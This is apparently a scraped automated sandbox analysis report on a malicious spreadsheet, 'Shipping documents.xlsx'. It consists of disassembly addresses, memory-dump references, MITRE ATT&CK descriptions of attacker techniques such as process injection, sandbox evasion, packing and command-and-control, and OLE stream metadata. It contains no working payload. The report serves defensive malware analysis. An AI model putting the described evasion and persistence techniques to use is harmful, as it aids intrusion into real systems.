0x023f1ffa
0x023f1ffd
0x023f2000
0x00000000
0x00000000
0x0240ecf1
0x00000000
0x0240ecf1
0x00000000
0x023dfe06
0x023dfde8
0x023dfdec
0x023dfdef
0x023dfdf2
0x00000000
0x023dfdf2
0x023dfdcb
0x023dfd04
0x023dfd05
0x0240ec67
0x00000000
0x00000000
0x0240ec6f
0x00000000
0x0240ec6f
0x023dfd13
0x023dfd3c
0x023dfd40
0x0240ec75
0x0240ec7a
0x00000000
0x0240ec8a
0x0240ec8a
0x0240ec90
0x0240ecb2
0x023dfd73
0x023dfd73
0x00000000
0x023dfd73
0x0240ec95
0x00000000
0x00000000
0x0240eca1
0x0240eca4
0x0240eca5
0x00000000
0x0240eca5
0x0240ec7a
0x023dfd4a
0x00000000
0x023dfd6e
0x023dfd6e
0x023dfd71
0x00000000
0x023dfd71
0x023dfd4a
0x023dfd21
0x023ea3a1
0x00000000
0x023ea3a1
0x023dfd36
0x023f200b
0x023f2012
0x00000000
0x00000000
0x023f2018
0x00000000
0x023f2018
0x00000000
0x023dfd36
0x023dfe0f
0x023dfe16
0x023ea3ad
0x00000000
0x00000000
0x023ea3b3
0x023ea3b3
0x023dfe1f
0x0240ed25
0x0240ed86
0x00000000
0x00000000
0x0240ed91
0x0240ed95
0x0240ed95
0x0240ed9a
0x0240edad
0x0240edb3
0x0240edba
0x0240edc4
0x0240edc9
0x00000000
0x0240edcc
0x0240ed2a
0x0240ed55
0x00000000
0x00000000
0x0240ed61
0x0240ed66
0x0240ed6e
0x00000000
0x00000000
0x0240ed7d
0x00000000
0x0240ed7d
0x0240ed30
0x00000000
0x00000000
0x0240ed3c
0x0240ed43
0x0240ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 023DFD94

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: d1bee3a5855ee1b2ab497ae4ef5ada5e1c27e2184484890afaf2b7cf7e2c0061
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 7A91A132D0024AEFDF24CF68E8857AEB7B4EF45709F20847AD416A7691E7304B95CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Shipping documents.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Shipping documents.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Stream Path: EncryptedPackage, File Type: data, Stream Size: 194696